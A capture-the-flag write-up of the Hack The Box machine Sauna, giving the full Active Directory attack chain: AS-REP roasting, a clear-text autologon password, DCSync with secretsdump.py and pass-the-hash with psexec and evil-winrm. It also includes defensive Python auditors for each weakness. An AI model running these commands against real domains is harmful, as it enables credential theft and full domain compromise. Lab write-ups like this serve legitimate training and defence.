
Sauna - HTB Writeup

Machine Overview

Sauna was an easy-rated Windows machine. An AS-REP Roasting attack gave us the hash of the fsmith user, which we cracked with hashcat. For lateral movement, we obtained the clear-text password of the svc_loanmgr user from the Winlogon registry key. svc_loanmgr has DCSync rights on the domain, which we used to dump the domain's password hashes and perform a pass-the-hash attack to gain access to the Administrator account.


User

Scanning through Nmap

First, we'll use nmap to scan all 65535 TCP ports on the target and identify the services running. I'll use the -p- flag to scan every port and --min-rate 10000 to speed up the process. After scanning, we'll filter the results down to the open port numbers using terminal tools like cut and tr. Here's the complete command:

$ nmap -p- --min-rate 10000 10.10.10.175 -oN ini.txt && grep -E '^[0-9]+/tcp' ini.txt | cut -d '/' -f1 | tr '\n' ','

Now, let's run a thorough scan on these specific ports:

$ nmap -p53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49668,49673,49674,49675,49721,49744 -sC -sV -A -T4 10.10.10.175 -oN scan.txt
  • -sC runs the default NSE scripts
  • -sV enables service and version detection
  • -A enables OS detection, version detection, script scanning, and traceroute
  • -T4 selects the aggressive timing template
  • -oN writes the result to the specified file

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Egotistical Bank :: Home
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-01-09 00:57:04Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49668/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49675/tcp open  msrpc         Microsoft Windows RPC
49721/tcp open  msrpc         Microsoft Windows RPC
49744/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 3h20m23s
| smb2-time: 
|   date: 2024-01-09T00:58:10
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Information Gathering

Through Nmap, we discovered that port 53 (DNS) is open, which we can test for zone transfers. Port 80 (HTTP) is open, along with port 88 (Kerberos), which is useful for user enumeration. Ports 139 and 445 (SMB) are open, so we can check whether anonymous access lists any shares for an initial foothold. Port 389 (LDAP) is open, as is port 5985 (WinRM), which will give us a login to the machine once we have valid credentials. Nmap's LDAP scripts identified the domain name as EGOTISTICAL-BANK.LOCAL. Let's add this to our local /etc/hosts file so the domain name resolves on our machine.

Port 53 DNS

Let's start with port 53 (DNS) and attempt a zone transfer using dig (Domain Information Groper, a tool for querying DNS name servers, verifying and troubleshooting DNS problems, and performing DNS lookups). The command is dig axfr @10.10.10.175 EGOTISTICAL-BANK.LOCAL. Here, axfr is the zone-transfer query type, the mechanism by which DNS zone data is replicated between name servers; a server that answers it for anyone hands over every record in the zone. However, we were unable to retrieve any useful information.

Port 80 http

Now, let’s move on to the next port, which is port 80 (HTTP). A simple bank website is running on this port, and it appears to be static, with no interaction with user input.


After scrolling down, I found the names of the bank's team members. These names could be very useful for an AS-REP Roasting attack, which checks whether any of the accounts has Kerberos pre-authentication disabled (the "Do not require Kerberos preauthentication" account option). However, I'm not sure about the naming convention used inside the bank. Typically, it follows the format <First Initial><Last Name>, so our candidate usernames in the domain would be:
  • fsmith
  • scoins
  • sdriver
  • btylor
  • hbear
  • skerb

Port 88 Kerberos

We will take a closer look at these users in the exploitation phase. Let's move on to the next enumeration step, port 88 (Kerberos). We can use it to enumerate users even though we don't have any valid credentials yet. To enumerate domain users we'll use kerbrute, a tool for quickly brute-forcing and enumerating valid Active Directory accounts through Kerberos pre-authentication. It can also perform password spraying against the domain if we manage to find a valid password. Kerbrute provides several commands:

Available Commands:
  bruteforce    Bruteforce username:password combos, from a file or stdin
  bruteuser     Bruteforce a single user's password from a wordlist
  help          Help about any command
  passwordspray Test a single password against a list of users
  userenum      Enumerate valid domain usernames via Kerberos
  version       Display version info and quit

We'll use the userenum command:

$ kerbrute userenum -d EGOTISTICAL-BANK.LOCAL /usr/share/seclists/SecLists-master/Usernames/xato-net-10-million-usernames.txt --dc 10.10.10.175
  • -d is the domain name
  • --dc is the domain controller.

Kerbrute found some valid accounts, including fsmith, which we had already guessed from the website, and also reported that fsmith has "Do not require Kerberos preauthentication" set; for such an account kerbrute dumps the AS-REP hash directly. We can exploit this weakness.

$ kerbrute userenum -d EGOTISTICAL-BANK.LOCAL  /usr/share/seclists/SecLists-master/Usernames/xato-net-10-million-usernames.txt --dc 10.10.10.175

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: dev (n/a) - 01/08/24 - Ronnie Flathers @ropnop

2024/01/08 17:34:48 >  Using KDC(s):
2024/01/08 17:34:48 >  	10.10.10.175:88

2024/01/08 17:35:53 >  [+] VALID USERNAME:	 administrator@EGOTISTICAL-BANK.LOCAL
2024/01/08 17:41:46 >  [+] VALID USERNAME:	 hsmith@EGOTISTICAL-BANK.LOCAL
2024/01/08 17:42:39 >  [+] VALID USERNAME:	 Administrator@EGOTISTICAL-BANK.LOCAL
2024/01/08 17:46:00 >  [+] fsmith has no pre auth required. Dumping hash to crack offline:
$krb5asrep$18$fsmith@EGOTISTICAL-BANK.LOCAL:bd03f23e7dfb4e339ebbc9893f994ee8$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
2024/01/08 17:46:00 >  [+] VALID USERNAME:	 fsmith@EGOTISTICAL-BANK.LOCAL

We can crack this hash offline and, since we saw earlier that port 5985 (WinRM) is open, log in to the machine with evil-winrm.

Port 389 LDAP

Using ldapsearch, we can enumerate users in the domain and discover the naming context, etc. Let’s first discover the naming context of the domain. The command will be:

$ ldapsearch -x -H ldap://10.10.10.175 -s base namingcontexts
  • -x uses simple (here anonymous) authentication
  • -H is the LDAP URI of the host
  • -s base limits the search scope to the base object, which with an empty base DN is the root DSE
  • namingcontexts is the attribute we request; it lists the domain's naming contexts

$ ldapsearch  -x -H ldap://10.10.10.175 -s base namingcontexts 
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts 
#
dn:
namingcontexts: DC=EGOTISTICAL-BANK,DC=LOCAL
namingcontexts: CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
namingcontexts: CN=Schema,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
namingcontexts: DC=DomainDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL
namingcontexts: DC=ForestDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL

Port 139 & 445 SMB

We also have SMB ports open. Let’s try to list out SMB shares if they are available publicly using smbclient. The command will be smbclient -L \\10.10.10.175. Here, -L is used to list shares. However, there are no shares available for us.

$ smbclient -L \\10.10.10.175
Password for [WORKGROUP\kali]:
Anonymous login successful

	Sharename       Type      Comment
	---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.175 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

Exploitation

Now, moving on to the exploitation phase: we have a list of users, and Kerbrute has identified that the user fsmith has "Do not require Kerberos preauthentication" set. This setting can be exploited with an AS-REP Roasting attack. When pre-authentication is disabled, the KDC hands out an AS-REP for that account to anyone who asks, without the requester first proving knowledge of the password. Part of that reply is encrypted with a key derived from the user's password, so an attacker can take it offline and attempt to crack it just like a password hash.

For exploitation, we'll use GetNPUsers.py from the Impacket toolkit. GetNPUsers.py requests TGTs for domain users who have "Do not require Kerberos preauthentication" set, without knowing their passwords, and prints the resulting AS-REP hashes in a crackable format.

Let’s try to crack it using hashcat.

$ hashcat hashes rockyou.txt

We successfully cracked the hash; the password is Thestrokes23.
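The "Do not require Kerberos preauthentication" option that kerbrute and GetNPUsers.py hunt for is a single bit (0x400000, UF_DONT_REQUIRE_PREAUTH) in each account's userAccountControl attribute, which the same ldapsearch enumeration shown in the LDAP section can return once you have credentials. The following added example, which is not part of the write-up or of any of the tools it uses, parses ldapsearch-style LDIF and lists every account with that bit set, so a defender can audit the domain for this weakness before anyone roasts it. The LDIF entries, account names and userAccountControl values are constructed for the example.

```python
"""Audit AD accounts for Kerberos pre-authentication disabled (added example).

Input: LDIF text as printed by
  ldapsearch ... '(objectClass=user)' sAMAccountName userAccountControl
Output: the sAMAccountNames whose userAccountControl has UF_DONT_REQUIRE_PREAUTH set.
"""
import base64

# userAccountControl bits (ADS_USER_FLAG_ENUM); only the ones this audit uses
UF_ACCOUNTDISABLE = 0x0002
UF_DONT_EXPIRE_PASSWD = 0x10000
UF_DONT_REQUIRE_PREAUTH = 0x400000

# Constructed sample, modelled on ldapsearch's LDIF layout. The entries and
# flag values are invented for this example and were not taken from the box.
SAMPLE_LDIF = """\
# extended LDIF
#
# LDAPv3
# base <DC=EGOTISTICAL-BANK,DC=LOCAL> with scope subtree
# filter: (objectClass=user)
# requesting: sAMAccountName userAccountControl
#

dn: CN=FSmith,CN=Users,DC=EGOTISTICAL-BANK,DC=LOCAL
sAMAccountName: FSmith
userAccountControl: 4260352

dn: CN=HSmith,CN=Users,DC=EGOTISTICAL-BANK,DC=LOCAL
sAMAccountName: HSmith
userAccountControl: 66048

dn: CN=oldcontractor,CN=Users,DC=EGOTISTICAL-BANK,DC=LOCAL
sAMAccountName: oldcontractor
userAccountControl: 4260354
"""


def parse_ldif(text):
    """Return one {attribute: [values]} dict per LDIF entry.

    Handles comment lines, folded continuation lines (leading space) and
    base64 values ("attr:: ..."); entries are separated by blank lines.
    """
    logical = []
    for line in text.splitlines():
        if line.startswith(" ") and logical:
            logical[-1] += line[1:]          # unfold a continuation line
        else:
            logical.append(line)

    entries, current = [], {}
    for line in logical:
        if line.startswith("#"):
            continue
        if not line.strip():
            if current:
                entries.append(current)
                current = {}
            continue
        name, _, value = line.partition(":")
        value = value.strip()
        if value.startswith(":"):            # "attr:: base64" form
            value = base64.b64decode(value[1:].strip()).decode("utf-8", "replace")
        current.setdefault(name.strip(), []).append(value)
    if current:
        entries.append(current)
    return entries


def decode_uac(value):
    """Translate a userAccountControl integer into the flags this audit cares about."""
    flags = int(value)
    return {
        "disabled": bool(flags & UF_ACCOUNTDISABLE),
        "password_never_expires": bool(flags & UF_DONT_EXPIRE_PASSWD),
        "no_preauth": bool(flags & UF_DONT_REQUIRE_PREAUTH),
    }


def accounts_without_preauth(ldif_text, include_disabled=False):
    """List sAMAccountNames that can be AS-REP roasted.

    Disabled accounts are skipped by default: the KDC refuses them, so they are
    not roastable, but they still deserve cleanup, hence the switch.
    """
    findings = []
    for entry in parse_ldif(ldif_text):
        if "userAccountControl" not in entry or "sAMAccountName" not in entry:
            continue
        state = decode_uac(entry["userAccountControl"][0])
        if state["no_preauth"] and (include_disabled or not state["disabled"]):
            findings.append(entry["sAMAccountName"][0])
    return findings


if __name__ == "__main__":
    for name in accounts_without_preauth(SAMPLE_LDIF, include_disabled=True):
        print(f"pre-authentication disabled: {name}")
```

The remediation is simply to clear the option on each account the audit lists (and to ask why it was set; it is usually a leftover from a legacy application). On the detection side, an AS-REQ that succeeds without pre-authentication shows up on the domain controller as Security event 4768 with Pre-Authentication Type 0, which is worth alerting on once the known legacy accounts are excluded.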

Shell as fsmith

As we discovered through Nmap that the WinRM port 5985 is open, we can use Evil-WinRM to log in as fsmith.

$ evil-winrm -i 10.10.10.175 -u fsmith -p Thestrokes23
  • -i is the target IP
  • -u is the user name
  • -p is the user's password.

Privilege Escalation

Enumeration using Winpeas

When we get a shell on a Windows domain machine, the first thing to check is which user accounts exist in the domain. Besides the built-in Guest and krbtgt accounts, we found only four: Administrator, fsmith, hsmith, and svc_loanmgr.

*Evil-WinRM* PS C:\Users\FSmith\Documents> net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator            FSmith                   Guest
HSmith                   krbtgt                   svc_loanmgr
The command completed with one or more errors.

After discovering the users, let's run WinPEAS.exe. WinPEAS is a collection of local Windows privilege-escalation checks that looks for cached credentials, user accounts, access controls, interesting files, registry permissions, service accounts, patch levels, and more. To get it onto the box, we first start an SMB server on our attacking machine hosting a share that the victim can reach. For this we use smbserver.py from the Impacket toolkit.

$ sudo smbserver.py myshares ~/tools/AD -username ab -password ab -smb2support 
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

Now map the share on the victim machine so that we can access it there.

$ net use \\10.10.16.28\myshares /u:ab ab
The command completed successfully.

*Evil-WinRM* PS C:\Users\FSmith\Documents> cd \\10.10.16.28\myshares
*Evil-WinRM* PS Microsoft.PowerShell.Core\FileSystem::\\10.10.16.28\myshares>

Now, run WinPEAS on the victim machine and save the output to a file "suana_peas" in our share so that we can read it on the attacker machine. However, I didn't find anything useful there. So, next, I decided to hunt for credentials on the domain. Here is a great source on password hunting written by Juggernaut Pentesting Academy. In the registry-keys part, I found the Winlogon registry key, which stores the credentials used by the Windows feature called Autologon. Autologon lets you configure Windows' built-in automatic logon; if it is enabled, the password is stored in clear text in the registry.

*Evil-WinRM* PS Microsoft.PowerShell.Core\FileSystem::\\10.10.16.28\myshares> reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon
    AutoRestartShell    REG_DWORD    0x1
    Background    REG_SZ    0 0 0
    CachedLogonsCount    REG_SZ    10
    DebugServerCommand    REG_SZ    no
    DefaultDomainName    REG_SZ    EGOTISTICALBANK
    DefaultUserName    REG_SZ    EGOTISTICALBANK\svc_loanmanager
    DisableBackButton    REG_DWORD    0x1
    EnableSIHostIntegration    REG_DWORD    0x1
    ForceUnlockLogon    REG_DWORD    0x0
    LegalNoticeCaption    REG_SZ
    LegalNoticeText    REG_SZ
    PasswordExpiryWarning    REG_DWORD    0x5
    PowerdownAfterShutdown    REG_SZ    0
    PreCreateKnownFolders    REG_SZ    {A520A1A4-1780-4FF6-BD18-167343C5AF16}
    ReportBootOk    REG_SZ    1
    Shell    REG_SZ    explorer.exe
    ShellCritical    REG_DWORD    0x0
    ShellInfrastructure    REG_SZ    sihost.exe
    SiHostCritical    REG_DWORD    0x0
    SiHostReadyTimeOut    REG_DWORD    0x0
    SiHostRestartCountLimit    REG_DWORD    0x0
    SiHostRestartTimeGap    REG_DWORD    0x0
    Userinit    REG_SZ    C:\Windows\system32\userinit.exe,
    VMApplet    REG_SZ    SystemPropertiesPerformance.exe /pagefile
    WinStationsDisabled    REG_SZ    0
    scremoveoption    REG_SZ    0
    DisableCAD    REG_DWORD    0x1
    LastLogOffEndTimePerfCounter    REG_QWORD    0x156458a35
    ShutdownFlags    REG_DWORD    0x13
    DisableLockWorkstation    REG_DWORD    0x0
    DefaultPassword    REG_SZ    Moneymakestheworldgoround!

From this, I found that the user svc_loanmanager has autologon configured, and its clear-text password is Moneymakestheworldgoround!. This loanmanager account looks very much like the domain account svc_loanmgr we discovered before. Now we can move laterally to svc_loanmgr. Let's log in to it with evil-winrm using these credentials.

$ evil-winrm -i 10.10.10.175 -u svc_loanmgr -p Moneymakestheworldgoround!
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> whoami
egotisticalbank\svc_loanmgr
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> 
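Leaving a DefaultPassword value behind is exactly the misconfiguration that turned the fsmith foothold into a second account here. The following added example, which is my code and not part of the write-up or of WinPEAS, parses reg query output for the Winlogon key and flags clear-text autologon credentials, so the check can be run over registry exports collected from a whole fleet. The sample output is constructed with a placeholder domain, user and password; the value names and layout follow the reg query output above.

```python
"""Flag clear-text Autologon credentials in Winlogon `reg query` output (added example)."""
import re

# Constructed sample modelled on the `reg query` output shown above. The
# domain, user and password values are placeholders, not data from the box.
SAMPLE_REG_QUERY = """\

HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\Currentversion\\Winlogon
    AutoRestartShell    REG_DWORD    0x1
    CachedLogonsCount    REG_SZ    10
    DefaultDomainName    REG_SZ    EXAMPLEDOMAIN
    DefaultUserName    REG_SZ    EXAMPLEDOMAIN\\svc_example
    LegalNoticeCaption    REG_SZ
    Shell    REG_SZ    explorer.exe
    DefaultPassword    REG_SZ    placeholder-password
"""

# A second constructed sample: autologon switched on, but no password left in the registry
SAMPLE_AUTOLOGON_ONLY = """\
HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\Currentversion\\Winlogon
    AutoAdminLogon    REG_SZ    1
    DefaultUserName    REG_SZ    kiosk
"""


def parse_reg_query(text):
    """Return {value_name: (reg_type, data)} from `reg query <key>` output.

    reg query prints the key path flush left and each value indented, with the
    name, type and data separated by runs of spaces; the data may be empty.
    """
    values = {}
    for line in text.splitlines():
        if not line.startswith(" "):
            continue                                   # key path header or blank line
        parts = re.split(r"\s{2,}", line.strip(), maxsplit=2)
        if len(parts) < 2 or not parts[1].startswith("REG_"):
            continue                                   # not a value line
        name, reg_type = parts[0], parts[1]
        data = parts[2] if len(parts) == 3 else ""
        values[name] = (reg_type, data)
    return values


def audit_winlogon(values):
    """Return human-readable findings for Winlogon values that expose credentials."""
    lookup = {name.lower(): data for name, (_, data) in values.items()}
    findings = []
    if lookup.get("defaultpassword", ""):
        user = lookup.get("defaultusername", "<unknown user>")
        findings.append(f"clear-text DefaultPassword stored for {user}")
    if lookup.get("autoadminlogon", "0").strip() == "1":
        findings.append("AutoAdminLogon is enabled")
    return findings


if __name__ == "__main__":
    for sample in (SAMPLE_REG_QUERY, SAMPLE_AUTOLOGON_ONLY):
        for finding in audit_winlogon(parse_reg_query(sample)):
            print(finding)
```

Note that the output from the box has no AutoAdminLogon value at all, yet the password is still sitting there; the audit therefore fires on DefaultPassword by itself rather than only when autologon is switched on. Two caveats: the Sysinternals Autologon tool stores the password as an LSA secret named DefaultPassword instead of this registry value, so an empty result here does not prove there is no autologon, and the fix is to remove the value and rotate the account's password, since anyone who could read the key has already seen it.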

Now that we're in the svc_loanmgr account, let's run SharpHound, the data collector for BloodHound, which gathers information from across the domain and is the preferred way to collect this data. Run ./SharpHound.exe --CollectionMethods All. After it completes, download the resulting zip to your local machine and run BloodHound. Upload the data to BloodHound and start investigating the graphs. We transfer and run SharpHound the same way we ran WinPEAS before.

To run BloodHound, we first need to start Neo4j, a graph database system. Then, upload the data collected by SharpHound to BloodHound.


To start BloodHound, open a new terminal and type bloodhound, then press Enter. If it’s your first time running BloodHound, you’ll need to reset the default credentials, which are neo4j:neo4j. After logging in, upload the zip file created by SharpHound. You can either drag and drop the file into BloodHound or use the “Upload Data” button. Wait for the data to upload into the database.


After successfully uploading the data, it’s time to start the investigation. Use the search bar to find both users fsmith and svc_loanmgr, then right-click on each user and select Mark User as Owned.


Now, navigate to the Analysis tab and, under the Shortest Path section, select Shortest Path to Domain Admins from owned Principals. The graph shows that our user svc_loanmgr has DCSync rights on the domain. A DCSync attack uses the Microsoft Directory Replication Service Remote Protocol (MS-DRSR) to mimic a domain controller (DC) and retrieve user credentials from a real DC.

Exploitation

DCSync abuses MS-DRSR (Microsoft Directory Replication Service Remote Protocol), the protocol domain controllers use to replicate directory data between each other so that every DC holds current data for all users in Active Directory (AD). In a DCSync attack, an account that holds replication rights on the domain impersonates a domain controller and requests the credentials stored in the domain. To exploit this, we use secretsdump.py from the Impacket toolkit.

$ secretsdump.py 'EGOTISTICAL-BANK/svc_loanmgr:Moneymakestheworldgoround!@10.10.10.175'
Impacket v0.11.0 - Copyright 2023 Fortra

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
.
.
.
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:dc0111a7b0d303055899524e983198cb:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:42ee4a7abee32410f470fed37ae9660535ac56eeb73928ec783b015d623fc657
Administrator:aes128-cts-hmac-sha1-96:a9f3769c592a8a231c3c972c4050be4e
Administrator:des-cbc-md5:fb8f321c64cea87f
.
.
.
SAUNA$:aes128-cts-hmac-sha1-96:bc403a1efe37ae09e938eccb8e0f5b7f
SAUNA$:des-cbc-md5:91f2a8d051abbc86
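The edge BloodHound drew maps to two control-access rights on the domain object, DS-Replication-Get-Changes and DS-Replication-Get-Changes-All, and every use of them by a principal that is not a domain controller is worth an alert. The following added example, which is not from the write-up or from Impacket, shows the detection side: it runs over Windows Security event 4662 records (which require the "Directory Service Access" audit subcategory to be enabled on the DCs) and reports replication requests made by non-DC accounts. The events are constructed as plain dictionaries; the field names and the rights GUIDs are real, the non-replication GUID and the records themselves are invented.

```python
"""Detect DCSync-style replication requests in Security event 4662 (added example)."""
import re

# Control-access-right GUIDs that grant directory replication (real values)
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}")

# Constructed events: a subset of the 4662 fields, plus one unrelated 4624 record.
# SAUNA$ (the DC computer account) and the user names are those seen on the box;
# the "Properties" strings and the third record are invented for the example.
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "SAUNA$", "SubjectDomainName": "EGOTISTICALBANK",
     "Accesses": "Control Access",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "svc_loanmgr", "SubjectDomainName": "EGOTISTICALBANK",
     "Accesses": "Control Access",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "FSmith", "SubjectDomainName": "EGOTISTICALBANK",
     "Accesses": "Read Property",
     "Properties": "{00000000-0000-0000-0000-000000000001}"},   # invented, not a replication right
    {"EventID": 4624, "SubjectUserName": "svc_loanmgr", "SubjectDomainName": "EGOTISTICALBANK"},
]


def replication_rights_used(event):
    """Names of the replication rights referenced by a 4662 event's Properties field."""
    if event.get("EventID") != 4662:
        return []
    guids = set(GUID_RE.findall(event.get("Properties", "").lower()))
    return [name for guid, name in REPLICATION_RIGHTS.items() if guid in guids]


def detect_dcsync(events, domain_controllers, allow_list=()):
    """Return (account, rights) for replication requests by principals that are
    neither domain-controller computer accounts nor on the allow list.

    domain_controllers: computer account names such as {"SAUNA$"}.
    allow_list: non-DC accounts that legitimately replicate, e.g. an Entra ID
    (Azure AD) Connect service account; keep it short and reviewed.
    """
    expected = {n.lower() for n in domain_controllers} | {n.lower() for n in allow_list}
    alerts = []
    for event in events:
        rights = replication_rights_used(event)
        if not rights:
            continue
        subject = event.get("SubjectUserName", "")
        if subject.lower() in expected:
            continue
        alerts.append((subject, rights))
    return alerts


if __name__ == "__main__":
    for account, rights in detect_dcsync(SAMPLE_EVENTS, domain_controllers={"SAUNA$"}):
        print(f"possible DCSync by {account}: {', '.join(rights)}")
```

The domain-controller set should come from the directory (the Domain Controllers OU), not be typed by hand, because real DCs replicate constantly and would otherwise drown the alert in noise. The secretsdump.py run above is exactly what this would catch: its "Using the DRSUAPI method" line is the replication request, made by svc_loanmgr rather than by a DC. The fix on the box is to remove the replication ACEs from svc_loanmgr on the domain object.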

Pass-The-Hash attack

Now that we have obtained the NTLM hash for the Administrator user, we can perform a pass-the-hash attack using various tools such as wmiexec, psexec, and evil-winrm.

Using wmiexec

$ wmiexec.py 'EGOTISTICAL-BANK/Administrator@10.10.10.175' -hashes 'aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e'
Impacket v0.11.0 - Copyright 2023 Fortra

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>shell
C:\>shell
C:\>whoami
egotisticalbank\administrator

Using psexec

$ psexec.py 'EGOTISTICAL-BANK/Administrator@10.10.10.175' -hashes 'aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e'
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Requesting shares on 10.10.10.175.....
[*] Found writable share ADMIN$
[*] Uploading file rzxyopMa.exe
[*] Opening SVCManager on 10.10.10.175.....
[*] Creating service elyw on 10.10.10.175.....
[*] Starting service elyw.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.973]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

Using Evil-winrm

In evil-winrm, we pass only the NT half of the LM:NT hash pair, using -H.

$ evil-winrm -i 10.10.10.175 -u Administrator -H 823452073d75b9d1cf70ebdf86c7f98e
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>

Flags

User : 338784697d48cf4……..4731361025

Root : f64948489f……..b50ee303995272

Happy Hacking ❤

This post is licensed under CC BY 4.0 by the author.